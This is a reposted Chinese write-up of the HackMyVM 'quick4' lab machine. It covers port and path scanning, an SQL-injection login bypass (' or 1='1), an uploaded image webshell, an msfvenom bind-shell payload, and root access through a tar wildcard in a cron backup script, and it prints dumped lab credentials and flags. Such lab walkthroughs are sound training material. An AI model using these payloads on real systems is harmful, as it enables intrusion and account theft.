quick4 - hackmyvm

简介

靶机名称:quick4

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick4

本地环境

虚拟机:vitual box

靶场IP(quick4):192.168.56.104

跳板机IP(windows 11):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

nmap起手

nmap -sT --min-rate 10000 -p0- 192.168.56.104 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;

经典22和80端口

image-20240608160759229

tcp细扫

nmap -sT -sV -sC -O -p$ports 192.168.56.104 -oA nmapscan/detail

image-20240608161346219

得知有个/admin/路径

HTTP

gobuster扫描路径,发现有一个/employee

gobuster dir -u http://192.168.56.104 -w $HVV_PATH/8_dict/SecLists-master/Discovery/Web-Content/directory-list-2.3-big.txt -b 400-404 -t 10 -x php,zip,bak,jpg,png,mp4,mkv,txt,html

image-20240609132900449

image-20240609132933155

尝试了几轮,发现用任意邮箱和万能密码' or 1='1就可以直接进入后台……

image-20240609133138821

在修改密码界面可以获取密码为gOkRYKGwN57my7bNN2

image-20240609133211716

人员管理界面给随便一个人上传图片马,顺便把密码也改了

image-20240609140408948

image-20240609140424209

退出,登陆该用户的账号后就能发现头像已经是我们的马了

image-20240609141306068

蚁剑连接成功

image-20240609141418463

升级shell

尝试了好久,反弹shell怎样也回不来……简单靶机也懒得重启排查了,直接上传个bind马连上去就好了

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=9002 -f elf > msf

image-20240609144015973

在/home目录下找到user.txt

image-20240609144127516

HMV{7920c4596aad1b9826721f4cf7ca3bf0}

提权

信息收集

在/var/www/html/employee目录下的admin.php文件中找到数据库配置文件

image-20240609145114063

fastandquicktobefaster

成功登入mysql,得到账密信息(但是没卵用)

mysql> select * from users;
select * from users;
+----+-----------------------------------+-----------------+--------------------+----------+----------------------+
| id | email                             | name            | password           | role     | profile_picture      |
+----+-----------------------------------+-----------------+--------------------+----------+----------------------+
|  1 | info@quick.hmv                    | Quick           | Qe62W064sgRTdxAEpr | admin    | uploads/1_admin.png  |
|  2 | nick.greenhorn@quick.hmv          | Nick Greenhorn  | C3ho049g4kwxTxuSUA | employee | uploads/2_2.jpg      |
|  3 | andrew.speed@quick.hmv            | Andrew Speed    | o30VfVgts73ibSboUP | employee | uploads/3_andrew.jpg |
|  4 | jack.black@email.hmv              | Jack Black      | 1Wd35lRnAKMGMEwcsX | customer |                      |
|  5 | mike.cooper@quick.hmv             | Mike Cooper     | Rh978db3URen64yaPP | employee | uploads/5_mike.jpg   |
|  6 | j.doe@email.hmv                   | John Doe        | 0i3a8KyWS2IcbmqF02 | customer |                      |
|  7 | jane_smith@email.hmv              | Jane Smith      | pL2a92Po2ykXytzX7y | customer |                      |
|  8 | frank@email.hmv                   | Frank Stein     | 155HseB7sQzIpE2dIG | customer |                      |
|  9 | fred.flinstone@email.hmv          | Fred Flinstone  | qM51130xeGHHxKZWqk | customer |                      |
| 10 | s.hutson@email.hmv                | Sandra Hutson   | sF217VruHNj6wbjofU | customer |                      |
| 11 | b.clintwood@email.hmv             | Bill Clintwood  | 2yLw53N0m08OhFyBXx | customer |                      |
| 12 | j.bond@email.hmv                  | James Bond      | 7wS93MQPiVQUkqfQ5T | customer |                      |
| 13 | d.trumpet@email.hmv               | Donald Trumpet  | f64KBw7cGvu1BkVwcb | customer |                      |
| 14 | m.monroe@email.hmv                | Michelle Monroe | f64KBw7cGvu1BkVwcb | customer |                      |
| 15 | jeff.anderson@quick.hmv           | Jeff Anderson   | 5dX3g8hnKo7AFNHXTV | employee | uploads/15_jeff.jpg  |
| 16 | lee.ka-shingn@quick.hmv@quick.hmv | Lee Ka-shing    | am636X6Rh1u6S8WNr4 | employee | uploads/16_lee.jpg   |
| 17 | laura.johnson@email.hmv           | Laura Johnson   | 95T3OmjOV3gublmR7Z | customer |                      |
| 18 | coos.busters@quick.hmv            | Coos Busters    | f1CD3u3XVo0uXumGah | employee | uploads/18_coos.jpg  |
| 19 | n.down@email.hmv                  | Neil Down       | Lj9Wr562vqNuLlkTr0 | customer |                      |
| 20 | t.green@email.hmv                 | Teresa Green    | 7zQ19L0HhFsivH3zFi | customer |                      |
| 21 | k.ball@email.hmv                  | Krystal Ball    | k1TI68MmYu8uQHhfS1 | customer |                      |
| 22 | juan.mecanico@quick.hmv           | Juan Mecnico   | 5a34pXYDAOUMZCoPrg | employee | uploads/22_juan.jpg  |
| 23 | john.smith@quick.hmv              | John Smith      | 5Wqio90BLd7i4oBMXJ | employee | uploads/23_john.jpg  |
| 24 | misty.cupp@email.hmv              | Misty Cupp      | c1P35bcdw0mF3ExJXG | customer |                      |
| 25 | lara.johnson@quick.hmv            | Lara Johnson    | 123                | employee | uploads/25_2.php     |
| 26 | j.daniels@email.hmv               | James Daniels   | yF891teFhjhj0Rg7ds | customer |                      |
| 27 | dick_swett@email.hmv              | Dick Swett      | y6KA4378EbK0ePv5XN | customer |                      |
| 28 | a.lucky@email.hmv                 | Anna Lucky      | c1P35bcdw0mF3ExJXG | customer |                      |
| 29 | 123@qq.com                        | 123             | 123                | customer |                      |
+----+-----------------------------------+-----------------+--------------------+----------+----------------------+
29 rows in set (0.00 sec)

然后祭出linpeas,发现有backup.sh

image-20240609151631366

#!/bin/bash
cd /var/www/html/
tar czf /var/backups/backup-website.tar.gz *

定时任务

定时任务里面也有相关任务

image-20240609151941299

gtfobins上有写怎么利用,因为*会把文件名当成参数读入,所以直接在/var/www/html/像下面这样构造即可

image-20240609164425078

image-20240609164838669

然后就能弹到shell了

image-20240609164920973

提权成功,root用户目录下找到flag

HMV{858d77929683357d07237ef3e3604597}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/25478.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

推荐三款你不知道的良心软件

推荐三款你不知道的良心软件

Tico——抠图、拼图软件 抠图软件大家见过很多了把,但是从多张图片中抠出来的图片拼接成一张图片你们很少见过吧。 Tico就是一款将抠出来的图片拼接成一张新图片的软件,目前仅支持IOS平台。 Tico拼贴图提供了强大的图像编辑和处理功能,用户…
阅读更多...
论文降痕指南:如何有效降低AIGC率

论文降痕指南:如何有效降低AIGC率

随着 AI 技术迅猛发展,各种AI辅助论文写作的工具层出不穷! 为了防止有人利用AI工具进行论文代写,在最新的学位法中已经明确规定“已经获得学位者,在获得该学位过程中如有人工智能代写等学术不端行为,经学位评定委员会…
阅读更多...
连续状态方程的离散化例子

连续状态方程的离散化例子

连续状态方程的离散化 在控制系统中,连续状态方程的离散化是一个重要的步骤,用于将连续时间系统转换为离散时间系统,以便在数字控制器中实现。这通常涉及将连续时间的微分方程转换为离散时间的差分方程。常用的离散化方法 前向欧拉法(Forward Euler)简单易实现,但精度较…
阅读更多...
ssm615基于ssm的房源管理系统+vue【已测试】

ssm615基于ssm的房源管理系统+vue【已测试】

前言:👩‍💻 计算机行业的同仁们,大家好!作为专注于Java领域多年的开发者,我非常理解实践案例的重要性。以下是一些我认为有助于提升你们技能的资源: 👩‍💻 SpringBoot…
阅读更多...
312. 戳气球 Hard

312. 戳气球 Hard

有 n 个气球,编号为0 到 n - 1,每个气球上都标有一个数字,这些数字存在数组 nums 中。 现在要求你戳破所有的气球。戳破第 i 个气球,你可以获得 nums[i - 1] * nums[i] * nums[i 1] 枚硬币。 这里的 i - 1 和 i 1 代表和 i 相邻…
阅读更多...
程序猿大战Python——pycharm软件的使用

程序猿大战Python——pycharm软件的使用

基础配置 目标:了解PyCharm软件的基础配置处理。 修改背景颜色: Appearance -> Theme 修改字体大小: 搜索font -> Font 例如,一起完成背景、字体大小的修改。 总结: (1)如果要对PyChar…
阅读更多...
专业场景化ChatGPT论文润色提示词指令,更精准、更有效辅助学术论文撰写

专业场景化ChatGPT论文润色提示词指令,更精准、更有效辅助学术论文撰写

大家好,感谢关注。我是七哥,一个在高校里不务正业,折腾学术科研AI实操的学术人。可以添加我(yida985)交流学术写作或ChatGPT等AI领域相关问题,多多交流,相互成就,共同进步。 在学术写…
阅读更多...
二叉树最大宽度

二叉树最大宽度

文章目录 前言二叉树最大宽度1.题目解析2.算法原理3.代码编写 总结 前言 二叉树最大宽度 1.题目解析 给你一棵二叉树的根节点 root ,返回树的 最大宽度 。 树的 最大宽度 是所有层中最大的 宽度 。 每一层的 宽度 被定义为该层最左和最右的非空节点(即…
阅读更多...
商城项目【尚品汇】08异步编排

商城项目【尚品汇】08异步编排

文章目录 1.线程的创建方式1.1继承Thread类,重写run方法1.2实现Runnable接口,重写run方法。1.3实现Callable接口,重新call方法1.4以上三种总结1.5使用线程池创建线程1.5.1线程池创建线程的方式1.5.2线程池的七大参数含义1.5.3线程池的工作流程…
阅读更多...
Java面向对象-[封装、继承、多态、权限修饰符]

Java面向对象-[封装、继承、多态、权限修饰符]

Java面向对象-封装、继承、权限修饰符 一、封装1、案例12、案例2 二、继承1、案例12、总结 三、多态1、案例 四、权限修饰符1、private2、default3、protected4、public 一、封装 1、案例1 package com.msp_oop;public class Girl {private int age;public int getAge() {ret…
阅读更多...
Redis系列-5 Redis分布式锁

Redis系列-5 Redis分布式锁

背景: 本文介绍Redis分布式锁的内容,包括Redis相关命令和Lua脚本的介绍,以及操作分布式锁的流程与消息,最后结合Redission源码介绍分布式锁的实现原理。 1.基本命令 1.1 基本键值对的设置 设值: set key value 取值: get key …
阅读更多...
SPI通信协议

SPI通信协议

SPI通信结介绍 W25Q64是一个Flash存储器芯片,内部可以存储8M字节的数据,并且是掉电不丢失的。 四根通信线:SCK(Serial Clock)串行时钟线、MOSI(Master Output Slave Input)主机输出从机输入、M…
阅读更多...
【十大排序算法】快速排序

【十大排序算法】快速排序

在乱序的世界中,快速排序如同一位智慧的园丁, 以轻盈的手法,将无序的花朵们重新安排, 在每一次比较中,沐浴着理性的阳光, 终使它们在有序的花园里,开出绚烂的芬芳。 文章目录 一、快速排序二、…
阅读更多...
profile-3d-contrib,github三维立体图的使用

profile-3d-contrib,github三维立体图的使用

图片展示: 提示: 这个profile-3d-contrib存储库有时候会出现问题,导致又有使用这个存储库svg的用户显示出现问题. 参考: https://zhuanlan.zhihu.com/p/681786778 原仓库链接: GitHub - yoshi389111/github-profile-3d-contrib: This GitHub Action creates a Gi…
阅读更多...
【算法刷题 | 动态规划08】6.9(单词拆分、打家劫舍、打家劫舍||)

【算法刷题 | 动态规划08】6.9(单词拆分、打家劫舍、打家劫舍||)

文章目录 21.单词拆分21.1题目21.2解法:动规21.2.1动规思路21.2.2代码实现 22.打家劫舍22.1题目22.2解法:动规22.2.1动规思路22.2.2代码实现 23.打家劫舍||23.1题目23.2解法:动规23.2.1动规思路23.2.2代码实现 21.单词拆分 21.1题目 给你一…
阅读更多...
java中的异常-异常处理(try、catch、finally、throw、throws)+自定义异常

java中的异常-异常处理(try、catch、finally、throw、throws)+自定义异常

一、概述 1、java程序员在编写程序时提前编写好对异常的处理程序,在程序发生异常时就可以执行预先设定好的处理程序,处理程序执行完之后,可以继续向后执行后面的程序 2、异常处理程序是在程序执行出现异常时才执行的 二、5个关键字 1、tr…
阅读更多...
Redis实战篇02

Redis实战篇02

1.分布式锁Redisson 简单介绍: 使用setnx可能会出现的极端问题: Redisson的简介: 简单的使用: 业务代码的改造: private void handleVoucherOrder(VoucherOrder voucherOrder) {Long userId voucherOrder.getUserI…
阅读更多...
2024真机项目

2024真机项目

项目需求: 1. 172.25.250.101 主机上的 Web 服务要求提供 www.exam.com 加密站点,该站点在任何路由可达 的主机上被访问,页面内容显示为 "Hello,Welcome to www.exam.com !",并提供 content.exam.com/yum/A…
阅读更多...
数据:人工智能的基石 | Scale AI 创始人兼 CEO 亚历山大·王的创业故事与行业洞见

数据:人工智能的基石 | Scale AI 创始人兼 CEO 亚历山大·王的创业故事与行业洞见

引言 在人工智能领域,数据被誉为“新石油”,其重要性不言而喻。随着GPT-4的问世,AI技术迎来了新的浪潮。众多年轻创业者纷纷投身这一领域,Scale AI的创始人兼CEO亚历山大王(Alexander Wang)就是其中的佼佼…
阅读更多...
什么是Java?

什么是Java?

什么是Java?java是什么?下面我们来总结一下。 java是什么? java是一个静态编程语言,具有强大的多线程特征,目前java不仅采用c语言的优点,还去掉了一些多继承指针,等复杂的概念,我们…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023